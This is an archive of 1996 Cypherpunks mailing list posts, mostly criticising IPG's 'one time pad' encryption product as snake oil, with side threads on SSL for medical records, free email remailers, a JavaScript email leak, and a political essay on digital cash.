> the truth - we invite whatever number you might choose to try - if some 
> subset of Cyberpunks break the system, then they can publish everything -

(can anyone else parse this?)  BTW, this ain't alt.cyberpunk.  More
problems with terminology?

I don't have to break the IPG system.  It was born broken.  I am not
about to trust my key generation to people who can't even get basic
technical terms correct, much less trust them not to send copies of the
keys offsite to the NSA^H^H^H^H^H^H^H^H^H^H^H for disposal.  (recall that
IPGsales said no copies of the keys were retained _by them_)

Snake oil is only good if you have a squeaky snake.
- -- 
Roy M. Silvernail, writing from roy@cybrspc.mn.org
"Ah, man.. you hit the nails right on the heads there.  However, I think
you drove them right into your own forehead."
        -- datsun@wasteland.spam.org (Datsun Q. Wanderer)

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMSsdlhvikii9febJAQEXIwP/bEIyYaP8/meDg5Hdlg48vDlubHRVPJOL
q88FrEdbu/EQa+WFcDmAwPRxg1M5BWGVgerFG+mYZnguPDr/qZ2vMEbuAzjhe4M2
iNdtE6C+JvrZfnRWDnGDywIrRXf9BYmWAZgkj2T4inP7thANcF8El0attCe7553M
xC4lXeDLtaA=
=xZEt
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Thu, 22 Feb 1996 02:37:53 +0800
To: cypherpunks@toad.com
Subject: Re: Internet Privacy Guaranteed ad (POTP Jr.)
Message-ID: <199602211728.JAA28234@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


> Unlike Mr. Silvernail, we have a much simplier definition of what we mean
> by a one time pad - given a message/file of length N, where N is a finite 
> practical number say less than 10 to the 1000th power, that the encrypted 
> ciphertext can be any of the N to the 256th power possibile clear/plain 
> text messages/files.  To prove that the IPG system does not work, all you 
> have to do is to prove that is not the case - that our system, without 
> artifically imposed boundary conditions will generate a subset of those 
> possibilities  - that is simple and strsight forward - not 
> hyperbole but action - everyone stated how simple it was to break the system,
> now everyone is back paddling aa fast as they can, like Mr. Metzger and some of the other big bad cyphermouths. 

We can be generous and characterize this as a typo.  If N is the length
in bytes, then the number of possible such messages is of course 256 to
the Nth power, not N to the 256th power as the message says.  For N=1,
for example, 256 to the Nth is 256, while N to the 256th is 1, and of
course there are 256 possible one-byte messages, not 1.

The wording is a little unclear, so let me offer this proposed
clarification, and see if IPG would agree.  It is a slight rewording of
what they wrote but I think means the same as what they said:

> Given a ciphertext of length N bytes, where N is less than 10 to the
> 1000th power, the corresponding plaintext can be any of the 256 to the
> Nth power possible plaintext messages of length N bytes.

I haven't followed the IPG discussion, but if their cipher actually does
satisfy this criterion it would be at least pretty close to a one-time
pad.

One definition of a OTP is that the output tells you nothing about the
input (except its length).  For any given output, all possible input
messages of that length are equally possible.

The definition proposed by IPG is similar to this; they say that for a
given output, the input could be any message of that length (at least, I
think that is what they are saying).  To be really as strong as a OTP
they should further have it that all these possible inputs are equally
probable.  However I suspect that if they can actually arrange that all
inputs are possible, then they will actually be equiprobable.

It follows from their definition that for a given plaintext message,
all possible cyphertexts of that length might result.  (Because if there
was some ciphertext that didn't result from a given plaintext, then for
that ciphertet message it would not be the case that the plaintext might
be any of the 256 to the Nth possibilities; it could not be that one.)

One thing I don't quite understand is whether keys are in fact reused
from message to message.  If the system is capable of encrypting, say, a
2K byte message such that all possible 2K byte cyphertexts might result,
then it should be capable of encrypting two 1K byte messages such that
the outputs are unrelated even if the inputs are the same.  So I don't
see why a system capable of satisfying the definition above would reuse
keys.

Can we agree that if the IPG system meets the definition they offered
(as clarified here) it would be as good as a OTP?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@lighthouse.homeport.org>
Date: Thu, 22 Feb 1996 00:38:24 +0800
To: mdiehl@dttus.com (Martin Diehl)
Subject: Re: Patient medical files on Net
In-Reply-To: <9601208248.AA824855630@cc1.dttus.com>
Message-ID: <199602211521.KAA06043@homeport.org>
MIME-Version: 1.0
Content-Type: text


	When I was working in a reasearch lab at a large hospital, we
considered using SSL for protecting some non-anonymized patient
information.

	We decided against putting those records on the web for a
number of reasons.  First was a general distrust of the SSL protocol.
Versions 1 & 2 were designed by amatuer cryptographers, to protect
credit card numbers.  We considered patient records much more private
than that.  Next was the de facto 40 bit keysize of Netscape.  We
didn't want to try to teach surgeons the difference between the 40 bit
crypto in the free version & the 128 bit in the pay for version.  They
were already convinced that Netscape was unbreakable encryption.
(Fortunately, this was about 2 days before the random numbers got to
the front page of the New York Times, so they believe me now.)  The
last reason was becuase I fully expect web servers to become the
sendmails of the 90s.  Big, badly configured, and used as a means of
breaking into a server.  Once someone breaks into a web server, all
the encryption in the world won't help; those files need to be
decrypted so they can be sent out under SSL's arbitrary keys.

Adam

|      Some obvious proposals would be to use something like SSL to do server 
|      to workstation encryption.  I don't know what issues may exist such as 
|      the effort to install SSL, key management, and processing delays due 
|      to session keys and traffic encryption.  In addition, how could an 
|      on-call doctor access patient records through an ISP and maintain 
|      patient privacy.  An obvious issue (which I know have been discussed 
|      on this list) has to do with the trade-off between key size and 
|      privacy.
|      
|      Any other thoughts?
|      
|      Martin G. Diehl
| 


-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Thu, 22 Feb 1996 00:40:14 +0800
To: m5@dev.tivoli.com (Mike McNally)
Subject: Re: Internet Privacy Guaranteed ad (POTP Jr.)
In-Reply-To: <9602211404.AA16345@alpha>
Message-ID: <199602211522.KAA09387@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Mike McNally writes:
> 
> IPG Sales writes:
>  > We do not keep copies, we would not be in business 30 days if 
>  > we did.
> 
> How do you ensure that the keys are not intercepted, duplicated by a
> man-in-the-middle, and forwarded?

Besides, how do we KNOW they don't keep the keys? Other than their
vigorous protestations, of course -- and even were they paragons of
virtue instead of being about as slimey as they come it wouldn't be
acceptable.

Any system in which a third, untrusted party generates your keys for
you is, plain and simple, totally unacceptable. Period. I cannot
conceive of the circumstances under which I would allow a client to
use such a system if they had anything more important to protect than
their grocery list.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mike Fletcher <fletch@ain.bls.com>
Date: Thu, 22 Feb 1996 00:58:30 +0800
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: Public Access Obsolete. Capitalism offers free email
In-Reply-To: <199602210325.WAA12218@thor.cs.umass.edu>
Message-ID: <9602211527.AA29311@outland>
MIME-Version: 1.0
Content-Type: text/plain


> Nobody writes:
> > It might be a cheap safe way to set up a remailer too...
> 
> I'd be (very pleasantly) surprised if they will let you run code on the free
> email account. After all, if you could, you could install a filter like 
> procmail and automatically trash most of the junk mail :}

	Who says the code has to run on their machine.  Just forward
all incoming mail off to another box, and send all the outgoing mail out
from the free account.  Depending of course on whether it's some sort
of shell account or if you POP/SMTP to their box.

	Just an idea.

---
Fletch                                                     __`'/|
fletch@ain.bls.com  "Lisa, in this house we obey the       \ o.O'    ______
404 713-0414(w)      Laws of Thermodynamics!" H. Simpson   =(___)= -| Ack. |
404 315-7264(h) PGP Print: 8D8736A8FC59B2E6 8E675B341E378E43  U      ------






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dan@milliways.org (Dan Bailey)
Date: Thu, 22 Feb 1996 01:10:07 +0800
To: ipgsales@cyberstation.net
Subject: Re: Internet Privacy Guaranteed ad (POTP Jr.)
Message-ID: <199602211534.KAA02195@remus.ultranet.com>
MIME-Version: 1.0
Content-Type: text/plain


Perhaps you should apply for an export license for your software.  I'm
sure that the ability to use your system across national borders fits
nicely within your marketing strategy.  To do so, you simply submit
your product to the U.S. National Security Agency, and submit a
Commodity Jurisdiction application to the State Department.  After the
NSA evaluates its security, you'll be able to sell your product
overseas.  Please see pages 610-618 of Applied Cryptography, Second
Edition for general information on the process.
	By the way, you might note that Cypherpunks is only a mailing list,
there is no way to get the signed consent of everyone on the list to
agree to anything, much less formal rules of a contest.  My suggestion
is to post the OTP-expansion algorithm to sci.crypt.  It's really in
all of our best interests to have the greatest number of people
examining your product.  Think of the publicity it will generate. 
Your work will remain protected with whatever patents or copyrights
you have applied for.  This approach is nothing new, RC2 and RC4 were
both posted to sci.crypt.  Both are in wider use today because of it. 
Both algorithms stood up to many people's tight scrutiny.  I think
your algorithm should be given the chance to do the same.
						Dan

**************************************************************************
Support your local info-calypse				 dan@milliways.org
"The Internet cannot be regulated.  It's not that laws aren't relevant, 
     it's that the nation state is not relevant." Nicholas Negroponte, 1996
       The Cypherpunks: Civil liberties through complex mathematics.
**************************************************************************





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ian Goldberg <iang@cs.berkeley.edu>
Date: Thu, 22 Feb 1996 03:50:20 +0800
To: cypherpunks@toad.com
Subject: Re: JavaScript to grab email
In-Reply-To: <9602201743.AA09495@MARIAN.SOGS.STSCI.EDU>
Message-ID: <312B66B0.3A8B3AD1@cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain


Mike Rose wrote:
> 
> >>>>> On Tue, 20 Feb 1996 14:21:31 -0500 (EST), "Mark M." <markm@voicenet.com> said:
> 
> >On Tue, 20 Feb 1996, Mike Rose wrote:
> 
> >>Changing the email address known to netscape doesn't help.  Your email
> >>address is in the message sent, regardless of what netscape thinks
> >>your identity is.
> 
> >I'm not sure I understand what you are saying.  The Javascript program
> >uses Netscape to send the e-mail.  The only way Netscape knows your actual
> >e-mail address is if you tell Netscape what it is.
> 
> Netscape doesn't need to know your email address.  Your email address
> is put into the headers by sendmail.  Netscape will make a "from"
> header of what you claim in the "indentity" field, but your real
> address is also in the headers - "sender:" in mine.
> 
I was under the impression that netscape doesn't run sendmail at all;
it speaks SMTP directly.  In that case, changing your email adress
in the options should suffice.

However, if you do this, actually sending mail and news from netscape
will get messed up, won't it?

   - Ian




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Thu, 22 Feb 1996 01:22:57 +0800
To: dan@milliways.org (Dan Bailey)
Subject: Re: Internet Privacy Guaranteed ad (POTP Jr.)
In-Reply-To: <199602211534.KAA02195@remus.ultranet.com>
Message-ID: <199602211545.KAA09477@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Dan Bailey writes:
> My suggestion
> is to post the OTP-expansion algorithm to sci.crypt.

Call it what it is -- a pseudo-random number generator, at best. As
you likely know (but the IPG folks don't seem to care) you can't
"expand" a one time pad. One time means ONE TIME. Look at how the NSA
broke the Venona intercepts of of even two-time use of keying material.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: olbon@dynetics.com (Clay Olbon II)
Date: Thu, 22 Feb 1996 01:20:38 +0800
To: IPG Sales <ipgsales@cyberstation.net>
Subject: Re: Internet Privacy Guaranteed ad (POTP Jr.)
Message-ID: <v01540b01ad50e8efff81@[193.239.225.200]>
MIME-Version: 1.0
Content-Type: text/plain


At 10:08 PM 2/20/96, IPG Sales wrote:

>Unlike Mr. Silvernail, we have a much simplier definition of what we mean
>by a one time pad - given a message/file of length N, where N is a finite
>practical number say less than 10 to the 1000th power, that the encrypted
>ciphertext can be any of the N to the 256th power possibile clear/plain
>text messages/files.  To prove that the IPG system does not work, all you
>have to do is to prove that is not the case - that our system, without
>artifically imposed boundary conditions will generate a subset of those
>possibilities  - that is simple and strsight forward - not
>hyperbole but action - everyone stated how simple it was to break the system,
>now everyone is back paddling aa fast as they can, like Mr. Metzger and
>some of the other big bad cyphermouths.

PROOF:

        Given that N is the length of the message in bits. The number of
possible combinations of bits is 2^N.  For any message length N > 1,
2^N < N^256.  Simple example.  Message length is 3 bits.  The maximum
number of possible combinations of these bits is 8.  This is far less than
3^256 (which is more than 10^100, i.e. it overflows the calculator on my
Mac).  Sorry guys.  Try learning some simple math before you try and sell
crypto.

        Clay

---------------------------------------------------------------------------
Clay Olbon II            | olbon@dynetics.com
Systems Engineer         | ph: (810) 589-9930 fax 9934
Dynetics, Inc., Ste 302  | http://www.msen.com/~olbon/olbon.html
550 Stephenson Hwy       | PGP262 public key: finger olbon@mgr.dynetics.com
Troy, MI 48083-1109      | pgp print: B97397AD50233C77523FD058BD1BB7C0
    "To escape the evil curse, you must quote a bible verse; thou
     shalt not ... Doooh" - Homer (Simpson, not the other one)
---------------------------------------------------------------------------






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Peter Monta <pmonta@qualcomm.com>
Date: Thu, 22 Feb 1996 03:40:33 +0800
To: cypherpunks@toad.com
Subject: Re: Internet Privacy Guaranteed ad (POTP Jr.)
In-Reply-To: <v01540b01ad50e8efff81@[193.239.225.200]>
Message-ID: <199602211851.KAA13160@mage.qualcomm.com>
MIME-Version: 1.0
Content-Type: text/plain


> > [ IPG Sales ]
> >
> >... any of the N to the 256th power possibile clear/plain text
> >messages/files.

Excuse me?  256^N.

> [ Clay Olbon ]
> PROOF:
> 
> For any message length N > 1, 2^N < N^256.

Excuse me?  2^N is not O(N^k).

Cypherpunks used to be a place where I could fairly reliably see
high-SNR commentary from real cryptographers/number theorists.
Now we have the blind replying to the blind's obfuscatory
nonsense, and the useful posts take some effort to find.

> Try learning some simple math before you try and sell crypto.

Surely it's not a requirement these days.

Peter Monta   pmonta@qualcomm.com
Qualcomm, Inc./Globalstar






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Thu, 22 Feb 1996 01:34:59 +0800
To: IPG Sales <ipgsales@cyberstation.net>
Subject: Re: Internet Privacy Guaranteed ad (POTP Jr.)
In-Reply-To: <Pine.BSD/.3.91.960220205816.21251A-100000@citrine.cyberstation.net>
Message-ID: <199602211553.KAA09492@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



IPG Sales writes:
[garbage about what a one time pad is]

Er, you guys redefine the word "Oxygen" to mean "A brown liquid
produced by fermenting barley and hops", too?

A one time pad crypto system requires that the length of the
completely random key (not "practically random", not "nearly random")
is equal to the length of the plaintext, and that which said key is
used once and *only once*. Using a key to produce a pseudo-random
sequence which is used to encrypt is *NOT* a one-time pad, and any
claim that it is constitutes fraud, pure and simple, just like a claim
that sugar water pills are antibiotics or that drops of red dye in a
mixture of grain alchohol and water are French red wine.

> this is also my answer to Mr. Metzger - do as you like, I have
> absolutely no ability to force you to do anything,

Of course not. However, I'll point out that you've annoyed me by
peddling merchandise that can potentially harm your clients and bring
a bad name to the field of cryptography.  People do have the ability
to go to your state's Attorney General, you know. Keep marketing this
crap and believe me, someone will -- very possibly even me. I am
almost sure that defrauding customers continues to be against the law
everywhere in the United States.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lmccarth@cs.umass.edu
Date: Thu, 22 Feb 1996 01:42:01 +0800
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: Internet Privacy Guaranteed ad (POTP Jr.)
In-Reply-To: <v01540b01ad50e8efff81@[193.239.225.200]>
Message-ID: <199602211610.LAA14937@opine.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


Clay writes:
>         Given that N is the length of the message in bits. The number of
> possible combinations of bits is 2^N.  For any message length N > 1,
> 2^N < N^256.  

Uh, nope. 2^N grows asymptotically faster than N^256. Actually, for any 
constants A and B, A^N grows asymptotically faster than N^B. For A=2, B=256,
the crossover happens somewhere before N=4096. 
2^4096 = 2^(16*256) > 2^(12*256) = (2^12)^256 = (4096)^256

If the IPG people are using N=5600 (weird choice) then certainly 
2^5600 > 5600^256, for what little that's worth.

(Ah, my computer science B.S. pays off ;)

-Lewis	"You're always disappointed, nothing seems to keep you high -- drive 
	your bargains, push your papers, win your medals, fuck your strangers;
	don't it leave you on the empty side ?"  (Joni Mitchell, 1972)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Thu, 22 Feb 1996 05:20:15 +0800
To: Declan McCullagh <declan@well.com>
Subject: Re: Bravo, mostly (Re: Banned Zambian newspaper now on the Web)
In-Reply-To: <Pine.3.89.9602210322.A27606-0100000@well>
Message-ID: <Pine.ULT.3.91.960221111216.2872A-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 21 Feb 1996, Declan McCullagh wrote:

> You seem to be unduly critical of my report. *shrug* I don't expect
> everyone to agree with me, and I suppose I should be happy that you think
> I'm "95% right," whatever that means.

No, you shouldn't care what I think. You should care about being right. 

Which I think you are, at least 95% of the time. But calling for Chiluba's
ouster after a couple hours' reading is a little hasty IMO. I'd have
stopped at something like, "Chiluba again showed his lack of respect for
democratic institutions and the free press by censoring the newspaper
reproduced below. He has also been criticized by the US State Department
and Amnesty International, though Zambia's record is better than that of
many other Sub-Saharan African states, most notably Nigeria, Rwanda, and
Burundi (which you might consider small praise indeed)." 

He's no hero, but I'd reserve the "Get the hell out" rhetoric for complete
tyrants who kill people for fun, and tolerate no independent press at all. 
There's plenty of those around. You'll be taken more seriously (and I 
think you SHOULD be taken more seriously) if you don't overreact.

-rich




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Thu, 22 Feb 1996 07:53:23 +0800
To: cypherpunks@toad.com
Subject: "consent of the governed"
Message-ID: <199602212023.MAA22936@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



I was musing over this phrase, "a government rules by consent of the
governed" which popped up in an earlier essay on digital cash (microcurrency)
I wrote here and deserves further elaboration. 
it seems like a basic and obvious truth on some levels, a concept 
held sacred by our founding fathers, but on the other hand its exact 
meaning has escaped precise analysis for many centuries, and in various
sense our government seems to have strayed far from this promise. 
what does it mean?

does it mean, "majority of the governed?" how exactly is consent 
expressed?

Barlow brings up this topic in his recent "cyberspace declaration of
independence" (which can clearly be criticized as out of touch with 
physical reality but is nevertheless compelling). the essay comes 
close to the major point I want to make:

I believe that the phrase "a government rules with the consent of the
governed" is one of those magic statements that is going to become
increasingly defined by new technology. 

often, the clear intent of
a law is not obvious until new technology is introduced that tests
its meaning. for example,
the "right to bear arms"-- does that mean submachinegun, handguns?
what about armor-piercing bullets? new technology is always constantly
forcing a new interpretation of laws.

or how about "the right to free speech" -- is cyberspace a place for
"speech", or is it something where things are published? which laws
apply? does it mean I am free to encrypt anything I want in any way
I choose?

interestingly, does the "freedom from illegal search and seizure" apply
to cryptographic encoding? in other words, is there such a thing
as search and seizure of bits (plaintext) in encoded messages?

these are all questions that have various answers (and I'm not really
too interested in debating them), but which in one
sense anything besides what a court decides is not relevant. and most
of these above questions could take decades to sort out in courts, if
ever.

===

anyway, my main point here: I believe that "a government rules with
the consent of the governed" is a phrase that is going to be tested
in the next few years, and more closely defined, because the emergence
of new cyberspatial technology. it seems to me
that libertarians would tend to say, "oh yeah, wouldn't it be great
if that were true. no one ever asked ME if I wanted to be in this
system". well, what if there was an actual overt choice of government
that when on with the citizen? what if we really could choose our
government? would be tend to believe that all governments are corrupt
inherently, or could new systems based on voluntary cooperation from
the start work?

in a sense, any government that uses force on its populace is violating
a charter rule, (if it was one), that a government rules by the consent
of the governed. if some segment of the populace is resisting this 
government, then obviously there is no consent among that sliver.

all this raises the question of how much a government can be split up
over a population. what is the "granularity" of government? to date,
governments are based on geographic region. they are often circumscribed
by various geographic features such as oceans or continents. but
would it be possible to construct a governing system in which 
geographic location is irrelevant? such that anyone, anywhere, can
pick whatever government they want? surely if such a thing is possible,
cyberspace comes the closest to facilitating it. but it would not
really be a government in the current sense of the word.

===

in my digital cash essay, I introduced a radical new interpretation
of the phrase "consent of the governed" that went largely unnoticed but
deserves further thought. in it, I proposed that "consent of the 
governed" is measured by whether people pay their taxes to a government.
in other words, not paying taxes is a basic test of whether an individual
does not subscribe to a particular government system.  there are other
obvious tests such as civil disobedience, but I believe this one is
going to serve as the basic operative test of the future.

this is radical for the following reason: today supposedly a government
has the authority to coerce "inhabitants" to pay their taxes and punish
them if they don't. interestingly, our whole country was started as
a sort of tax revolt, and yet today our taxes are arguably just as 
onerous and oppressive as any other country's. it is a heresy within
government circles to propose that citizens should have a choice in
paying taxes. "we could never permit it. it would never work". "nobody
would pay them". but is that to say, admittedly, "we do not have the 
consent of the governed"?

I believe that digital cash will give rise to the ability to have
completely "black" economic systems on scales far larger than ever
before practical. what this means is that anyone who wants to can
simply "opt out" of being seen by the existing government in their
economic transactions. I think this may actually lead to "underground
governments" in which people voluntarily subscribe to certain 
communities and their "laws" while at the same time opting out of
participation in the "overt" system they are geographically constrained 
to.

hence "we could never permit it" said by bureacrats may be true, but
not relevant-- their permission has nothing to do with what technology
permits. "it would never work" may actually be tested outright by
new technology and systems of mass cooperation (in a sense, the basic
point of government) developed in cyberspace.

in any case, I do believe Barlow has some very important points and
that we are on the verge of new forms of government that remove many
of the nagging difficulties of earlier human models. much of this
innovation will center around new definitions/explorations of the 
basic concept that "a government rules by the consent of the governed",
and the approach to collection of dues, or taxes, and the way that they
are allocated based on group decision processes, will be a chief area of 
experimentation and new approaches.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mark Cornick <mark@evol.resnet.jmu.edu>
Date: Thu, 22 Feb 1996 02:36:58 +0800
To: cypherpunks@toad.com
Subject: Re: Public Access Obsolete. Capitalism offers free email
In-Reply-To: <9602211527.AA29311@outland>
Message-ID: <199602211728.MAA13068@evol.resnet.jmu.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

> > > It might be a cheap safe way to set up a remailer too...
> > 
> > I'd be (very pleasantly) surprised if they will let you run code on the free
> > email account. After all, if you could, you could install a filter like 
> > procmail and automatically trash most of the junk mail :}
> 
> 	Who says the code has to run on their machine.  Just forward
> all incoming mail off to another box, and send all the outgoing mail out
> from the free account.  Depending of course on whether it's some sort
> of shell account or if you POP/SMTP to their box.

Although I haven't looked into this at all, somehow I can see them
requiring some sort of proprietary mailreader that *won't* let you
delete the ads without reading them (and probably not standards-based
either, so you couldn't replace it with something that would let you
skip the ads.)

Foo. You get what you pay for.

- --mark

Mark S. Cornick                      mailto:mark@evol.resnet.jmu.edu
Harrisonburg, VA                   http://evol.resnet.jmu.edu/~mark/
(for not much longer, though)         pgp key 84F8C8AD on keyservers
                                    or mail w/ subject "get pgp-key"

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Processed by Mailcrypt 3.4, an Emacs/PGP interface

iQCVAwUBMStWNQJ9CGSE+MitAQE/igP+N+N8bVMw/B+5ZqaYzrAZ4qpicCaHw3aM
+luk5/JQtPxFZ64dUMoSJOS2sSw/VIfI2KCL++UcB0+y0Mzv+LlMZsbHwkZjmUXH
2F1HiFvTql+U4rfGWVO7C/lOXQn1jENbesG7zrRkhPeruoKPr5Wjiec1rm3s4s9t
nUu3txVQnfY=
=JVFc
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Wink Junior <winkjr@teleport.com>
Date: Thu, 22 Feb 1996 08:18:59 +0800
To: cypherpunks@toad.com
Subject: Re: IPG hoax?
Message-ID: <199602212032.MAA19513@julie.teleport.com>
MIME-Version: 1.0
Content-Type: text


Arley Carter sez:

>Fess up guys. You are either:
>1.  A team of undergrads or graduate students conducting an "exploit". 
>2.  A Detweiller tentacle. Dr. FC ?
>3.  The return of Alice D'nonymous ?
>4.  The reason the coderpunks lists was started.

I must admit that after the first day I've been wondering if this whole
IPG thing isn't some kind of deep troll or early April Fool's joke.  Has
anyone actually spoken on the phone with IPG or confirmed their existence
in any way?  For the record, I'd like to state that I saw their ad posted
in comp.security.firewalls and forwarded an edited copy (technical details
only) to the list, but if this turns out to be a hoax of some sort, I was
and am not a willing participant.

Would IPG Sales please post an address and phone number so we can confirm
the company exists?

Wink




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: KarL MarX <karlmarx@illumini.demon.co.uk>
Date: Thu, 22 Feb 1996 22:52:18 +0800
To: cypherpunks@toad.com
Subject: A Challenge (perhaps!)
Message-ID: <2@illumini.demon.co.uk>
MIME-Version: 1.0
Content-Type: text/plain



Hi!

My friend has just written a new crypto program that he is trying to get
included on a PC Magazine CD-ROM over here... 

I don't know too much about it at the moment, but he said he thought it
would be a good idea to see if anyone on this list could crack it and thus
help to make it more secure. I don't know too much about it ATM...

I know it doesn't exercise key technology and relies on the secrecy of the
algorithm (which from my very limited knowledge on cryptography I think makes
it almost doomed from the start (?))... I have some ciphertext of this 
application but apart from that I have nothing else... Would anyone have any
objectiosn to this being posted to the list? If not, could someone tell me
what I should post to the list, plaintext and resulting ciphertext, would
that be enough, or shoudl I post some info on the algorithms as well ???

The application is written in Visual Basic and I could probably get a copy
of the compiled (well VB is actually interpreted, but that's neither here or
there) .EXE file....

-- 
Karl Marx




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Thu, 22 Feb 1996 03:04:33 +0800
To: cypherpunks@toad.com
Subject: OECD Canberra Papers
Message-ID: <199602211800.NAA21640@pipe1.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


Papers from the Australian/OECD Conference in Canberra are 
starting to appear, though none are specifically identified as 
coming from the restricted Group of Experts meeting on February 
9:

     
_________________________________________________________________

   

    http://www.nla.gov.au/gii/papers.html


   Joint Australian/OECD Conference on
   Security, Privacy and Intellectual Property Protection in 
the Global
   Information Infrastructure
   Canberra, 7 - 8 February 1996

     
_________________________________________________________________



The one by Shane Simpson thoughtfully examines the way 
technology is affecting the sharing of information once 
considered to be proprietary or secret or private. Among other 
topics, it also explores the release of government information, 
prying by Big Bro in the "public interest" and other 
long-standing practices being re-shaped by technology. Some 
mention of the spread of cryptography and the consequent power 
disputes.

     
_________________________________________________________________

   

     http://www.nla.gov.au/gii/simpson.html

   
    Managing Risks in the Global Information Infrastructure
  
    Professor Shane Simpson
    
   Founder and Director, Technology Risk Management Centre,
   Faculty of Law, University of Wollongong
   





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Thu, 22 Feb 1996 05:58:59 +0800
To: cypherpunks@toad.com
Subject: "This is not Coderpunks--we don't need no steenking cryptography!"
Message-ID: <ad50b3ff09021004c04a@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 6:51 PM 2/21/96, Peter Monta wrote:

>Cypherpunks used to be a place where I could fairly reliably see
>high-SNR commentary from real cryptographers/number theorists.
>Now we have the blind replying to the blind's obfuscatory
>nonsense, and the useful posts take some effort to find.

I believe this is why the "real cryptographers/number theorists" are now
supposed to post to "Coderpunks."

While I agree with your points, it now appears that this is the way things
are dividing up:

* Coderpunks -- number theory, DES, Haval, C/C++/Java, IETF and TCP/IP
stuff, digital signatures, crypto libraries and APIs, Diffie-Hellman,
BSAFE, RSAREF, etc.

* Cypherpunks -- nuclear bomb triggers, why women are more free under the
will of Allah than in Western decadent societies, movie reviews, SS
Obergruppenfuhrer Zimmermann, Zambian newspapers, alien bases in
Antarctica, Himalayan treks, etc.

Coderpunks is a membership-only list, with a list.cop who approves
membership and who expels those who post inappropriate material.
Cypherpunks is an open list, with no one ever having been expelled.

So, if anyone asks "What does this have to do with cryptography?!?!," point
out to him that this is Cypherpunks, not Coderpunks!

"Cryptography? You want _crytography_? This is not _Coderpunks_! We don't
have to show you no steenking cryptography!"


--Tim

Boycott espionage-enabled software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^756839 - 1  | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: olbon@dynetics.com (Clay Olbon II)
Date: Thu, 22 Feb 1996 03:05:46 +0800
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: Internet Privacy Guaranteed ad (POTP Jr.)
Message-ID: <v01540b05ad510ebfe1d0@[193.239.225.200]>
MIME-Version: 1.0
Content-Type: text/plain


At 11:10 AM 2/21/96, lmccarth@cs.umass.edu wrote:
>Clay writes:
>>         Given that N is the length of the message in bits. The number of
>> possible combinations of bits is 2^N.  For any message length N > 1,
>> 2^N < N^256.
>
>Uh, nope. 2^N grows asymptotically faster than N^256. Actually, for any
>constants A and B, A^N grows asymptotically faster than N^B. For A=2, B=256,
>the crossover happens somewhere before N=4096.
>2^4096 = 2^(16*256) > 2^(12*256) = (2^12)^256 = (4096)^256
>
>If the IPG people are using N=5600 (weird choice) then certainly
>2^5600 > 5600^256, for what little that's worth.
>
>(Ah, my computer science B.S. pays off ;)
>
>-Lewis  "You're always disappointed, nothing seems to keep you high -- drive
>        your bargains, push your papers, win your medals, fuck your strangers;
>        don't it leave you on the empty side ?"  (Joni Mitchell, 1972)

Oops.  Thanks for pointing this out.  I should probably just shut up about
this, but snake-oil salesmen really get under my skin.  Of course, being
wrong hasn't kept me from opening my mouth in the past so ...

        Clay

---------------------------------------------------------------------------
Clay Olbon II            | olbon@dynetics.com
Systems Engineer         | ph: (810) 589-9930 fax 9934
Dynetics, Inc., Ste 302  | http://www.msen.com/~olbon/olbon.html
550 Stephenson Hwy       | PGP262 public key: finger olbon@mgr.dynetics.com
Troy, MI 48083-1109      | pgp print: B97397AD50233C77523FD058BD1BB7C0
    "To escape the evil curse, you must quote a bible verse; thou
